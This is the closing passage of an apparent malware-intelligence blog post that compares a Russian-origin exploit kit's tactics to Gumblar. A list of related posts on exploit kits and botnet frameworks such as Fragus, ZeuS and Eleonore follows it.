Finally, these actions are very similar to those performed by Gumblar (which according to some sources is of Chinese origin, though I doubt it), and although I can't say that this case involves Gumblar's distribution mechanisms, especially because this kit is in the first instance of Russian origin (like Fragus), there is no doubt that the strategy as a whole is very similar.

Is this what many call Gumblar today?

Related information
Fragus. New botnet framework In-the-Wild
ZoPAck. New alternative for the exploitation of v...
ZeuS Botnet and its zombie recruitment power
DDBot. More Botnets management via web
Phoenix Exploit's Kit Another alternative for controlling botnets
INF `[LOADER]. Control of botnets, malware and spread (...)
Liberty Exploit System. (...) Another alternative for controlling botnets
Eleonore Exploits Pack. New Crimeware In-the-Wild
Russian crimeware prices. Part 2

Jorge Mieres
Pistus Malware Intelligence Blog